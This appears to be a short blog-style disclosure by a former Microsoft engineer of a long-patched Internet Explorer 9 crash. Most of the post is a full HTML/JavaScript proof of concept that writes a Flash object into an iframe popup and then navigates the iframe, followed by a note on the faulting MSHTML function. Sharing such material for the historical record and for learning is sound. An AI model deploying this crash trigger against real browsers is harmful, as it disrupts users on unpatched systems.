Rendering a Flash (or Silverlight) object inside an iframe’s createPopup and then navigating that iframe while the popup was still visible caused IE9 to crash.

<iframe name="iFrame" width="10" height="10"></iframe>
<input type="button" onclick="main()" value="CrashMe">
<script>
function main()
{
    cp = iFrame.createPopup();
    cp.show(0,0,1,1);
    cp.document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="50" height="50"><param name="movie" value="nothing" /></object><script defer>top.cp.hide();alert("Click OK to crash the Browser");<\/script>');
    cp.document.close();

    iFrame.location = "about:blank";
}
</script>

The fault occurred in MSHTML!CFakeUIWindow::SetBorderSpace when Flash attempted to communicate with the browser host that had already been invalidated by the iframe navigation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.